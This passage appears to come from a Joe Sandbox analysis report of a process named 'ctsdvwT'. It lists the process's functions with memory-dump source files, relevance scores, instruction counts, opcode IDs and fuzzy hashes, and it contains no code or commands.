                                        • Instruction Fuzzy Hash: 1921C0B0C01319DFDB21DF99D589B9DBFF5EB08314F24845AE408BB250C7795885CBA5
                                        Function 07F73180 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35ed37f9799136dbffef09cebcb806b6086f5a98f679429901aef4db54f75a66
                                        • Instruction ID: fc2926d417ec4db7b2950a88ff471f12f8cf84e68e019c2bc0b330d06952f5cf
                                        • Opcode Fuzzy Hash: 35ed37f9799136dbffef09cebcb806b6086f5a98f679429901aef4db54f75a66
                                        • Instruction Fuzzy Hash: 87216A756007159BC324DF69C8809BBBBF9FF88710B10896DE9199B320E770ED45CBA0
                                        Function 0143D006 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247772308.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_143d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 093daf1f70e89a40c8808294d50eaa0446d3ae0fb60b1171563e238f49fd6d0d
                                        • Instruction ID: 21744898a70317d95732fd21822a64dd9d42c9c27d7623c245afdcbb60ece5ef
                                        • Opcode Fuzzy Hash: 093daf1f70e89a40c8808294d50eaa0446d3ae0fb60b1171563e238f49fd6d0d
                                        • Instruction Fuzzy Hash: 672180755093808FDB03CF64D594716BF71EB8A214F28C5DBD8498F2A7C33A980ACB62
                                        Function 07F74D70 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5632e5052a565a2e3712201a9de6a4d26f92d28f4289ea3bc2ca383a3b995934
                                        • Instruction ID: e575c78e32787e0e57cd5364eb31412a98d90aac7a656b91498e00958a5d66f8
                                        • Opcode Fuzzy Hash: 5632e5052a565a2e3712201a9de6a4d26f92d28f4289ea3bc2ca383a3b995934
                                        • Instruction Fuzzy Hash: 0921AFB4A10908DFC704DF5AE684999BBF1FF88300B6280D5E448AB366DB31EE20DB04
                                        Function 07F769D8 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b18f57670781259744bf0e00a112792e0eb79985e00291c949108953b702eb8
                                        • Instruction ID: afeb9e3603bdf92bb78d0d07c7c3cb701142ad715dd4c9799085924d381b94af
                                        • Opcode Fuzzy Hash: 4b18f57670781259744bf0e00a112792e0eb79985e00291c949108953b702eb8
                                        • Instruction Fuzzy Hash: 331173B1E007165B9B10DB799C405BFBBFAEFC4660B188529E415D7344EF3099058761
                                        Function 07F78C61 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb17377ef0dccf1fbe15fcfd979fc52e6a2c90164b2b86b3f6e25e80fe430bfd
                                        • Instruction ID: 8aa11f0efabc8f91a7515b40ab717d253bb281df89263904677e621806f7eb91
                                        • Opcode Fuzzy Hash: cb17377ef0dccf1fbe15fcfd979fc52e6a2c90164b2b86b3f6e25e80fe430bfd
                                        • Instruction Fuzzy Hash: AA11E3B1A85700CFD7148F28C84ABA57BE1EF56310F5D80EAD5468F272D735E802CB12
                                        Function 07F7BCD8 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b764ed014e3469c7aeb357e0d471fe651afa81124ac42ffc71130418ceb1c99
                                        • Instruction ID: 0d32373bc58f85c5a0b9012218da61a7368d60083cf4295f4235ca03fbcea2da
                                        • Opcode Fuzzy Hash: 4b764ed014e3469c7aeb357e0d471fe651afa81124ac42ffc71130418ceb1c99
                                        • Instruction Fuzzy Hash: D821A7F4D18109DFCB44CFA9C1819AEBBF5BB4A300F649056D819A7711D770AE41CF61
                                        Function 0142D1F7 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247711239.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_142d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                        • Instruction ID: 2304c2fca1593897b1f163fcaad5922ed8f282a1e5121abc2b6573ad81df0eef
                                        • Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                        • Instruction Fuzzy Hash: 1021D276804240CFDB06CF44D9C4B16BF71FB85320F24C5AADD054B266C336D456CBA1
                                        Function 0142D4BF Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247711239.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_142d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: fdd68216954e9bc7c6a2d6f2c60ebf7418ed8d3224c46cd392588d652c0d5589
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: EB11E172804280CFDB02CF54D9C4B16BF71FB88314F24C6AAD9490B267C336D49ACBA2
                                        Function 07F772E4 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d595e98d61f20a3196ae0c4ac541795c167dc9eecf2da371ad9a067953396d8
                                        • Instruction ID: d880845deb85be2ecfe1af0ac2b5b15957593cff8908c26aaec994dfca00656b
                                        • Opcode Fuzzy Hash: 5d595e98d61f20a3196ae0c4ac541795c167dc9eecf2da371ad9a067953396d8
                                        • Instruction Fuzzy Hash: EC2114B58007499FCB10DF9AD888ADEBFF4FB49350F14841AE918A7310C378A954CFA5
                                        Function 0143D1CF Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247772308.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_143d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction ID: 7018adaf4781f69f9d54616845bdeb46528399bde715b1b34d7d07845e5fb32d
                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction Fuzzy Hash: AA11BB75904280DFDB02CF54C5C4B16BFA1FB88224F24C6AAD8494B3A6C33AD40ACB62
                                        Function 07F7BD90 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66f4f70dbc7d3a50aa6e69ad79560cd58b5b3731ba75a25a4149c9da7f1f14e4
                                        • Instruction ID: 3930c813af524767976b823d4d767d3e605c0d732256a762dc164dbb07476aa4
                                        • Opcode Fuzzy Hash: 66f4f70dbc7d3a50aa6e69ad79560cd58b5b3731ba75a25a4149c9da7f1f14e4
                                        • Instruction Fuzzy Hash: 7111D0B4E18209DFCB04DFA9C5809AEBBF9BB4A310F5495A6D409A7316D730EA41CB81
                                        Function 07F741CF Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65dae7209b6d09d76fe26cd43399c55a0c53bbbe83192432bf8376151c12f7a7
                                        • Instruction ID: 8f6bb127d93de677a7d39745ddefc0050f667f75556ab2cc435ec21699fc7653
                                        • Opcode Fuzzy Hash: 65dae7209b6d09d76fe26cd43399c55a0c53bbbe83192432bf8376151c12f7a7
                                        • Instruction Fuzzy Hash: 8001BC317042049FC6059B3CE9097667FDBEBC9651F0885BAE506C7365CE38EC16C255
                                        Function 07F78540 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65396f8358707ed701a87e72c1adc152999705924ee1c367b1b2c995bbd953af
                                        • Instruction ID: 767ea782d070a1d51d996e7964765d359b5b9d1706122c60987f2686952d9789
                                        • Opcode Fuzzy Hash: 65396f8358707ed701a87e72c1adc152999705924ee1c367b1b2c995bbd953af
                                        • Instruction Fuzzy Hash: A3F06DE1700305A6DB21BA1A9D98A6B6A9ACBD45A4B5C843BED09C3391DE10DC42C1B6
                                        Function 07F78C78 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e25007255d6cfc3c87757bb26d20e4d7fb837da5d5d2da121f55cdc5cbb3e55
                                        • Instruction ID: 4ba45f4c4ba35e84b53531d91766af0a5a27d75a0c7519713a8aa1e041084f40
                                        • Opcode Fuzzy Hash: 0e25007255d6cfc3c87757bb26d20e4d7fb837da5d5d2da121f55cdc5cbb3e55
                                        • Instruction Fuzzy Hash: AF015E70B467458FD3158B28C859F153BA5AF86700F5A80E6E115CF2B2DB25D801CB11
                                        Function 0142D759 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247711239.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_142d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e6f5c8d653ec0c1549abfbc1c9ac14be633922fbfccde4df1d8f897c27f813a
                                        • Instruction ID: ace93b685ac1629940e0cad93a6551d47986bf13ea343087818bf7e3ad4211ba
                                        • Opcode Fuzzy Hash: 3e6f5c8d653ec0c1549abfbc1c9ac14be633922fbfccde4df1d8f897c27f813a
                                        • Instruction Fuzzy Hash: BC01DB714043949AE7208A99DD84B67FF9CEF85320F58C46BED094B3A6C37D9881C6B1
                                        Function 07F7ADA0 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f2905906c0b4d0cd492102e5f9749cabae1d2f4f3bc9d65c5112723ded79b67
                                        • Instruction ID: 4ff1ad95611028e193d99e8193a8d443e5c975ea216d0e247557ea0e49a626de
                                        • Opcode Fuzzy Hash: 8f2905906c0b4d0cd492102e5f9749cabae1d2f4f3bc9d65c5112723ded79b67
                                        • Instruction Fuzzy Hash: A6016DB5E092198FCB10CF68D8817DDBBB5FF56310F0581EAD05897252E7704A45CF41
                                        Function 07F707C0 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56c717399748f560c1a64134245cacb2cbdd5dbdc442769bbf9ed3ebdac3a7af
                                        • Instruction ID: 8c6a7a7d2f3c2a5c95a4c109b6ffac8924c64093b19cc969353fc7959cd738d3
                                        • Opcode Fuzzy Hash: 56c717399748f560c1a64134245cacb2cbdd5dbdc442769bbf9ed3ebdac3a7af
                                        • Instruction Fuzzy Hash: 9F018F35A10218CBCB188B7AD85549ABFBBFFC8765B04457EE51683390DF71A921CB90
                                        Function 07F741E0 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b33a3b7fc02906d96b810f9db86baae2bab17c2a2569a268407dc81f4315163
                                        • Instruction ID: de7a1fc6ed5e2724e4bab38b689e94d8da979f22d84bfbe7194510ef30287839
                                        • Opcode Fuzzy Hash: 1b33a3b7fc02906d96b810f9db86baae2bab17c2a2569a268407dc81f4315163
                                        • Instruction Fuzzy Hash: AF01D1307001048FC6059B3CE908A667BDBEBC9351B0540BAE50AC7365CF38EC16C751
                                        Function 07F7D0B0 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ede7782906ea8696baec0416c6a733684a89bc7a12a021c6b52d380953db38b2
                                        • Instruction ID: bbbf97cbbc1ba5ebf10e49f29ee36786d14c6044d332bbb17da301b6bc783974
                                        • Opcode Fuzzy Hash: ede7782906ea8696baec0416c6a733684a89bc7a12a021c6b52d380953db38b2
                                        • Instruction Fuzzy Hash: 4C012C75A18108DFD704DFA9C685AADBFF9AF49300F58D095D40997261D730DE00DB40
                                        Function 07F7D038 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ecc2a4d6cefb1a011978e2a71e112edafa3e72e81852844d56564a810051a30
                                        • Instruction ID: 9c00ab074250fa186e7dd4c63eeb03b78b52a4f69ca412419b90137e11befa8c
                                        • Opcode Fuzzy Hash: 9ecc2a4d6cefb1a011978e2a71e112edafa3e72e81852844d56564a810051a30
                                        • Instruction Fuzzy Hash: 72F0AFF0A1C108DFCB04CF65C5009BDBFBDAF4A302F88B1A694095B22AC730CA46DB80
                                        Function 07F76F4C Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ddf86b8d97d20a3b3143f25873d2364358a5aa686eea5e5d5f00626c1773713
                                        • Instruction ID: 8fc11292e786501dfe46dfa37278d4a96297081e1376cb8184bdb338e1c3494c
                                        • Opcode Fuzzy Hash: 1ddf86b8d97d20a3b3143f25873d2364358a5aa686eea5e5d5f00626c1773713
                                        • Instruction Fuzzy Hash: 65010CB1C0061ADFDB15DF65C4447EEBAB1AF49350F198126E424EA290E7758A44CBD1
                                        Function 07F71430 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa6cced52514713866a5a59dea39a550f08f1eb6c6366f3f5d31eedc6b5b019f
                                        • Instruction ID: 85020357bdfecc185484a0fdf5ed43e4fbcb6770e1b85a97888e54ceab5cec2a
                                        • Opcode Fuzzy Hash: aa6cced52514713866a5a59dea39a550f08f1eb6c6366f3f5d31eedc6b5b019f
                                        • Instruction Fuzzy Hash: 79F0F672344A4957C3148A3A9C12A1BBFEFEBC6291B09C53BD145C3220EA34C50AC691
                                        Function 07F76438 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e63ff617af45994fea4557bc0a28f23d487e87ea7003aff435da9adfd9de18d0
                                        • Instruction ID: c8d2123f599704649a47171402a4e38855f3f451335be418db6ad2cb975c2aa6
                                        • Opcode Fuzzy Hash: e63ff617af45994fea4557bc0a28f23d487e87ea7003aff435da9adfd9de18d0
                                        • Instruction Fuzzy Hash: E0F02732754610ABCB145F3DD859B1A3BFADFC866172981BBE509C7311DD20DC0387A2
                                        Function 07F7ACFB Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1334222c39fe31be4780f3187f4c13c828e377400c7c46567c6d9f2b0acfcb7c
                                        • Instruction ID: 7410cb1de1df45cbb650aaf899dd04d9443627ff00c9214bbebd7690837d1967
                                        • Opcode Fuzzy Hash: 1334222c39fe31be4780f3187f4c13c828e377400c7c46567c6d9f2b0acfcb7c
                                        • Instruction Fuzzy Hash: 48F046F2949154CBCB149B58DCD0B9C7738FB47305F2412EAC21EA7155D7304AA9CF01
                                        Function 0142D758 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247711239.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_142d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f688cde820e3f7213209e7b3c7bcf9507539063f9621ea5aafa15e0f0bdf0784
                                        • Instruction ID: dd442230501fa5e94284f4a5514d0d083a0afcdbf6acf60e3cd48c5cd7fcf54f
                                        • Opcode Fuzzy Hash: f688cde820e3f7213209e7b3c7bcf9507539063f9621ea5aafa15e0f0bdf0784
                                        • Instruction Fuzzy Hash: CEF0F6714043949EEB208A0ADC84B63FFA8EF81734F18C45BED080B396C3799840CAB0
                                        Function 07F707B2 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6649f63a24edb9bf4c3b81d8891f14ca2854e09af63ac8483d565d9cd34d4e3c
                                        • Instruction ID: 92867856eacb120706c2782775ac0b8b975d6545ad9e39e788f8d41506e6c993
                                        • Opcode Fuzzy Hash: 6649f63a24edb9bf4c3b81d8891f14ca2854e09af63ac8483d565d9cd34d4e3c
                                        • Instruction Fuzzy Hash: 6AF0A771A102189BDB484A3ACC5669FBEEBEFC8790F04813AE415D3395DFB19D2686D0
                                        Function 07F76448 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 331d11d9ae93babe0de00dc772fe104dfc0b1f5e24c9744a90f94c0110d74998
                                        • Instruction ID: 10d6261394d63d1873336b32642bb407e964eaacad5c9cae817fbfe13a8dbcea
                                        • Opcode Fuzzy Hash: 331d11d9ae93babe0de00dc772fe104dfc0b1f5e24c9744a90f94c0110d74998
                                        • Instruction Fuzzy Hash: 04F02731B546145BCB145F3D941481A3AFA9FC866132800BBE509C7311DD30DC02C792
                                        Function 07F76F58 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1438628ca8a18eb5a6ead94cc1cc9b6bb05152c76d6e9d136b90ddb7b77a35c8
                                        • Instruction ID: 733fbcf2ec06ee0dcaea9355f1c20f8d6a54b555ddacd6ca4cc48317499835d9
                                        • Opcode Fuzzy Hash: 1438628ca8a18eb5a6ead94cc1cc9b6bb05152c76d6e9d136b90ddb7b77a35c8
                                        • Instruction Fuzzy Hash: 5E01ECB1C0061ADFDB14CF65C4047EEBAF1AF49360F14812AE424EA290E7744A40CFD0
                                        Function 07F7AD54 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6635af0056c4a4cb91b1cdb5f5737b8ee4459af2d6237ffcc31842cc3f956a5d
                                        • Instruction ID: c34a0cb02a9c2182ac386c98380f94c4f51d5639a8bc48ab69539b84678ababa
                                        • Opcode Fuzzy Hash: 6635af0056c4a4cb91b1cdb5f5737b8ee4459af2d6237ffcc31842cc3f956a5d
                                        • Instruction Fuzzy Hash: EAF089F5A0A5498FCB15CA68E8C56FC7B79FB87115F0552A6C11DC2122C6305995C701
                                        Function 07F71440 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a95c60f5ed6a2c84ff45b1962b19339f15140fd94c4d78a43303586ad8ee1e9
                                        • Instruction ID: 27aeb881e9f3088404ed152b89a60ed9981e2056bfa43bebc899005e781db575
                                        • Opcode Fuzzy Hash: 1a95c60f5ed6a2c84ff45b1962b19339f15140fd94c4d78a43303586ad8ee1e9
                                        • Instruction Fuzzy Hash: 44F027B175461947C3188E2B980582BBBEFEBC6391709C83BE109C7224EA34D90AC690
                                        Function 07F76FF8 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5556ba6706cf8939aa1aebd2f5c0b01bacec0e41ae215b1c7710cd55cda3ab9d
                                        • Instruction ID: f21fee24770290ff5ef2b558cc46cad1cfb427af49efc63f83d4d4cf9aabbf2d
                                        • Opcode Fuzzy Hash: 5556ba6706cf8939aa1aebd2f5c0b01bacec0e41ae215b1c7710cd55cda3ab9d
                                        • Instruction Fuzzy Hash: 1DE039727001286F93049BAED884C6BBBEDFBDD660361807AE508C7310DA319C01C6A0
                                        Function 07F78190 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4beb3d025e6decc26435fe639b42df08796f1a9584ba8ca35f47a3946284ffe9
                                        • Instruction ID: f0c3ce14455b5bc361fc969f533d3b665097147cec7d5ec7e49208c48a00d284
                                        • Opcode Fuzzy Hash: 4beb3d025e6decc26435fe639b42df08796f1a9584ba8ca35f47a3946284ffe9
                                        • Instruction Fuzzy Hash: E4F08272A18148AFDF05DFA8DC4599A7FBAEF44214B0880ABE444D7261E6749A50CB14
                                        Function 07F714B2 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2aaa69a551705786bd691014dd475aa8d75fe694a9a59837c7780ad80ed32866
                                        • Instruction ID: e530fa536abde551ecfaba346976ad4c01bcdaacccadea5b6a40e75cfc078609
